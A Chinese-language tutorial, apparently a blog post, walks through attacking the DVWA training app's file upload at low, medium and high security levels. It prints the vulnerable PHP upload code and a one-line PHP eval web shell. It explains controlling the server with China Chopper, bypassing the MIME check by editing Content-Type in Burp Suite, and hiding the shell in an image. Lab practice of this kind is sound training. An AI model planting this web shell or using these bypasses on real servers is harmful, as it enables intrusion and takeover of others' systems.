一句话木马攻击dvwa的文件上传漏洞


1.dvwap的low安全模式下,也就是当网站对上传的文件类型没有限制,给出的源代码如下:

<!-- wp:paragraph -->
<p>&lt;?php<br>if (isset($_POST['Upload'])) {</p>
<!-- /wp:paragraph -->

<!-- wp:code -->
<pre class="wp-block-code"><code>    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename( $_FILES&#91;'uploaded']&#91;'name']);

    if(!move_uploaded_file($_FILES&#91;'uploaded']&#91;'tmp_name'], $target_path)) {

        echo '&lt;pre&gt;';
        echo 'Your image was not uploaded.';
        echo '&lt;/pre&gt;';

      } else {

        echo '&lt;pre&gt;';
        echo $target_path . ' succesfully uploaded!';
        echo '&lt;/pre&gt;';   
    }
}?&gt;</code></pre>
<!-- /wp:code -->

可以上传php小木马脚本文件,其中写入如下一行代码:


通过爬取得到网站的目录结构后,利用中国菜刀等工具,输入url及密码pass(php脚本写入的密码),进入网站后门,进行自由的上传下载网站文件等。

  <?php @eval($_POST['password']) ?>

2.middle安全模式下时,对网站的上传文件有mine类型的限制,给出的源代码如下:

<!-- wp:paragraph -->
<p>&lt;?php<br>if (isset($_POST['Upload'])) {</p>
<!-- /wp:paragraph -->

<!-- wp:code -->
<pre class="wp-block-code"><code>    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    $target_path = $target_path . basename($_FILES&#91;'uploaded']&#91;'name']);
    $uploaded_name = $_FILES&#91;'uploaded']&#91;'name'];
    $uploaded_type = $_FILES&#91;'uploaded']&#91;'type'];
    $uploaded_size = $_FILES&#91;'uploaded']&#91;'size'];

    if (($uploaded_type == "image/jpeg") &amp;&amp; ($uploaded_size &lt; 100000)){
        if(!move_uploaded_file($_FILES&#91;'uploaded']&#91;'tmp_name'], $target_path)) {

            echo '&lt;pre&gt;';
            echo 'Your image was not uploaded.';
            echo '&lt;/pre&gt;';

          } else {

            echo '&lt;pre&gt;';
            echo $target_path . ' succesfully uploaded!';
            echo '&lt;/pre&gt;';

            }
    }
    else{
        echo '&lt;pre&gt;Your image was not uploaded.&lt;/pre&gt;';
    }
}?&gt;</code></pre>
<!-- /wp:code -->

加了只通过jepg的mine类型的判定条件后(关于mine类型,w3c给出的对比参考手册:MIME 参考手册),我们的.php脚本无法上传,这是可以用攻击机kali自带的burpsuite进行代理拦截,给浏览器加上代理后(具体怎么加代理,或怎么让burpsuite可以代理到物理机以后发布),通过proxy拦截了提交文件的请求,可以看到这时content-type是application/octet-stream,改为
jepg即可,发送请求出去后我们发现.php上传成功,我们成功绕过了这层拦截。

3.最后high级别的安全模式下,源代码如下:

<!-- wp:paragraph -->
<p>&lt;?php<br>if (isset($_POST['Upload'])) {<br>$target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";<br>$target_path = $target_path . basename($_FILES['uploaded']['name']);<br>$uploaded_name = $_FILES['uploaded']['name'];<br>$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);<br>$uploaded_size = $_FILES['uploaded']['size'];<br>if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" ||<br>$uploaded_ext == "JPEG") &amp;&amp; ($uploaded_size &lt; 100000)){<br>if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {</p>
<!-- /wp:paragraph -->

<!-- wp:code -->
<pre class="wp-block-code"><code>            echo '&lt;pre&gt;';
            echo 'Your image was not uploaded.';
            echo '&lt;/pre&gt;';

          } else {

            echo '&lt;pre&gt;';
            echo $target_path . ' succesfully uploaded!';
            echo '&lt;/pre&gt;';

            }
    }

    else{

        echo '&lt;pre&gt;';
        echo 'Your image was not uploaded.';
        echo '&lt;/pre&gt;';

    }
}?&gt;</code></pre>
<!-- /wp:code -->

可以看到这次不再是通过mine来筛选了,而是直接改成了必须上传的为固定的图片格式后缀才能成功,就算你利用了burpsuite设置代理拦截,修改文件的扩展名,也不能通过菜刀获取服务器的控制权,因为php文件修改了以jpg为扩展名后在服务器没法解析,这时可以通过图片木马实现。也就是通过图片木马制作工具在图片插入们上上面的一句话木马,再将图片上传上去,之后内容涉及到文件包涵漏洞分析,之后进行发布。


It is never too late to learn